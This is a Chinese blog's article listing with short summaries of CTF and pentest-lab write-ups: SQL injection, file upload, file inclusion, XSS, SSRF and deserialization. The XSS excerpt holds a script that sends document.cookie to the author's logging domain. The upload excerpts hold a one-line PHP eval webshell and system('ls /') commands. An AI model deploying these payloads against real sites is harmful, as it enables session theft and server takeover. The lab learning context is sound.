- 博客(43)
- 问答 (1)
- 收藏
- 关注
原创 泛微e-cology WorkflowServiceXml SQL注入漏洞(POC)
泛微 e-cology v10.64.1的/services/接口默认对内网暴露,用于服务调用,未经身份认证的攻击者可向 /services/WorkflowServiceXml 接口发送恶意的SOAP请求进行SQL注入,攻击者通过漏洞可以获取服务器数据库敏感信息。分析:基于当前情报,漏洞可能被用于攻击e-Cology WorkflowServiceXml系统,建议更新系统补丁、加强输入验证和限制访问权限。更新e-Cology WorkflowServiceXml系统到最新版本。
2024-07-16 09:57:37 1132
原创 Python 利用PYQT5设计基于RSA算法盲签名的匿名化电子支付系统设计与实现
本文使用PYTHON设计了基于盲签名的匿名化电子支付系统,并使用PYQT5进行页面设计
2024-01-08 00:20:41 1585 12
原创 使用PYQT制作人才交流管理系统
利用使用PYQT制作一个人才交流管理系统,先使用QT designer.exe设计好人才交流管理系统的各个UI界面,然后利用pyuic把生成的ui界面编译为py文件,在主函数文件内创建一个类继承ui.py界面的类,即可完成数据库逻辑与 GUI 代码分离,以提高可维护性和可重用性。
2023-07-08 11:32:30 645 2
原创 BUUCTF-逆向[GXYCTF2019]luck_guy1题解
BUUCTF-逆向[GXYCTF2019]luck_guy1题解,有关伪随机数知识和小端序存储知识
2023-04-05 17:41:37 1404 1
原创 网络渗透实验三:XSS用Beef劫持被攻击者客户端浏览器。Beef基础,SQL注入使用SQLMAP
网络渗透实验三:XSS用Beef劫持被攻击者客户端浏览器。Beef基础,SQL注入使用SQLMAPsqlmap基础
2022-11-07 18:50:49 606
原创 数据结构---实现队列的三种形式
数据结构---实现队列的三种形式,附带代码,用的是visual studio2022,望能帮助大家更好地学习数据结构的队列
2022-09-26 20:51:04 407
原创 pikachu靶场SQL,sqlmap解法
相信大家都熟悉了pikachu靶场的手工注入方法和原理,但是对于盲注等一些复杂的注入,自己一个个试十分麻烦,此时我们就可以使用sqlmap进行注入,所以我整理了一些pikachu靶场的sqlmap解法,让新手更好地适应和熟练使用sqlmap这款十分好用的工具...............
2022-07-31 20:59:43 2865 3
原创 vulnhub-DC-4靶机渗透记录(带字典)
vulnhub-DC-4 打靶记录,这个靶大多数都是信息收集有bp爆破,ssh连接,hydra爆破,普通用户提权,往敏感目录/ect/passwd 写入用户
2022-07-05 23:24:25 242
原创 ctfshow SQL注入Web175
查询语句//拼接sql语句查找指定ID用户$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";返回逻辑//检查结果是否有flag if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){ $ret['msg']='查询成功'; }Play...
2022-05-01 12:14:53 921
原创 ctfshow SQL注入Web171-174
2022/4/24SQL注入Web171语法:查询表中的数据查询所有行命令: select <字段1,字段2,...> from < 表名 > where < 条件>例如:查看表 MyClass 中所有数据mysql> select * from MyClass;查询语句//拼接sql语句查找指定ID用户$sql = "select username,password from user where username !='fl.
2022-04-25 19:12:49 1546
原创 ctfshow反序列化web256
反序列化Web256题目有判断password和username相不相等判断了才进行反序列化<?//ctfshow 反序列化web256class ctfShowUser{ public $username='1'; public $password='2'; public $isVip=ture; public function checkVip(){ return $this->isVip; }
2022-04-22 20:22:16 353
原创 ctfshow 反序列化Web254-255
2022/4/17反序列化漏洞的产生主要有以下两个原因:1. unserialize 函数的参数可控。2.存在魔法函数。魔法函数__construct,__destruct,__call,__callStatic,__get,__set,__isset,__unset,__sleep,__wakeup,__toString,__invoke,__set_state,__clone和__debuginfo等成员函数在PHP中被称为魔法函数。在命名自己的类方法时不能使用这些名称,除非是想使用其
2022-04-21 11:35:21 2299
原创 ctfshow 日志包含Web80-81
2022/4/16题目过滤了php和data,我们这次要用日志文件包含先抓包nginx日志的默认路径为/var/log/nginx.ssh日志的默认路径为/var/log/auth.logSSH服务如果开启了日志记录功能,会将SSH的连接日志记录到SSH日志文件中(题目是nginx日志)日志文件包含的漏洞的利用条件是:日志路径已知,并且有可读权限。日志文件的默认路径为上述现在要将恶意代码写入日志文件/?file=/var/log/nginx/access.log&
2022-04-16 22:28:28 6295
原创 ctfshow 文件包含Web78-79
Ctfshow文件包含漏洞Web782022/4/15漏洞简介:文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件包含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控制、被安装后门等危害。Web78考察php伪协议php://伪协议:php://伪协议是PHP提供的一些输人输出流访问功能,允许访问PHP的输入输出流,标准输人输出和错误描述符,.
2022-04-15 23:16:26 1896
原创 学习Kali的笔记
2022/4/15查看当前使用的Shell类型:/usr/bin/zsh#可以看到我们使用是zsh类型的shell。centos7 使用的是bash类型的shell。zsh功能更强,而且zsh完全兼容bash的用法和命令。配置apt命令在线安装包的源为国内源命令:# vim /etc/apt/sources.list配置apt国内源因为Kali自带的源是国外的,经常会因为网络问题,而无法安装或更新软件包。而且国外的源速度很慢。所以我们直接使用国内的源,方便快速。.
2022-04-15 21:06:50 1657
原创 ctfshowSSRF漏洞Web351-352
SRF漏洞简介SSRF意为服务端请求伪造(ServerSideRequestForge)。攻击者利用SSRF漏洞通过服务器发起伪造请求,这样就可以访问内网的数据,进行内网信息探测或者内网漏洞利用。SSRF漏洞形成的原因是:应用程序存在可以从其他服务器获取数据的功能,但是对服务器的地址并没有做严格的过滤,导致应用程序可以访问任意的URL链接。攻击者通过精心构造URL链接可以利用SSRF漏洞进行以下攻击:(1)通过服务器获取内网主机、端口和banner信息。(2)对内网的应用程序进行攻击,例如...
2022-04-13 17:15:38 1117
原创 ctf misc 图片隐写(所见非真)
第一次写misc题目走好多坑记录一下解题思路了得到题目一个压缩包还有一个照片用Winhex打开它在文件的最后发现了flag.txt,要把它提取出来把该图片文件拉入kali的主文件夹(没有kali的在VM上装个kali^^)用binwalk这个命令分解这个图片的文件binwalk - e scada. ipg得到这个文件夹...
2022-04-09 23:10:20 3332 4
原创 ctf misc之MP3隐写
2022/4/9第一次写mp3隐写,走了好多坑记录一下题目得到一个MP3文件和一个压缩包然后听一遍这个歌发现最后面有一段非常违和的用Audacity打开这个mp3查找了一下MP3的隐写方法有以下几种:MP3编码隐写将数据隐藏在MP3文件的奇偶校验块中(有个密码而且要用MP3Stego)音频频谱隐写音频波形隐写(结合莫尔斯密码)音频中的LSB(最低有效位)隐写然后本题目是:音频波形隐写点击这个小尖尖可以选择波谱图直接点看不到什么东西结合我...
2022-04-09 22:35:05 5474
原创 ctfshow XSS漏洞web316-328
2022/4/7Web316 XSS 反射性XSS圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋!CEYE - Monitor service for security testing先在这个网站注册一个账号获得一个临时的域名红框内的是临时的域名然后在方框中输入:<script>varimg=document.createElement("img");img.src="http://你的ceye地址/"+document.co..
2022-04-07 23:16:57 1966
原创 ctfshow信息收集Web18(玩游戏)
不要着急,休息,休息一会儿,玩101分给你flag点进去是一个游戏查看游戏的js代码查看js代码查看通过游戏后会展示的内容是一个Unicode编码的查看110.php得到Flag
2022-04-07 11:38:42 3793
原创 ctfshow文件上传web152
先写一个一句话木马文件<?phpeval($_POST[1]);?>上传我们刚刚写好的木马发现上传失败查看源码发现只能上传png文件把它改成php上传我们刚刚写的木马文件发现还是不行用抓包软件在上传的时候进行抓包发送到重发器Content-Type是文件类型,不同的文件都会对应不同的ContentType。PHP文件的文件类型为:application/octet-streamPng的Content...
2022-04-05 22:24:58 328
原创 ctfshow文件上传web151
2022/4/5先写一个一句话木马文件<?phpeval($_POST[1]);?>试着上传php木马文件上传失败查看源码发现只能上传png文件把它改成php上传我们刚刚写的木马文件访问我们刚刚上传的文件利用Hackbar用post的方式提交1=system("ls /");没有发现flag的文件查看上一层的目录用post的形式提交1=system("ls ../");发现...
2022-04-05 21:51:19 1158
空空如也
请教一下C语言字符串替换加密问题
2022-05-12
TA创建的收藏夹 TA关注的收藏夹
TA关注的人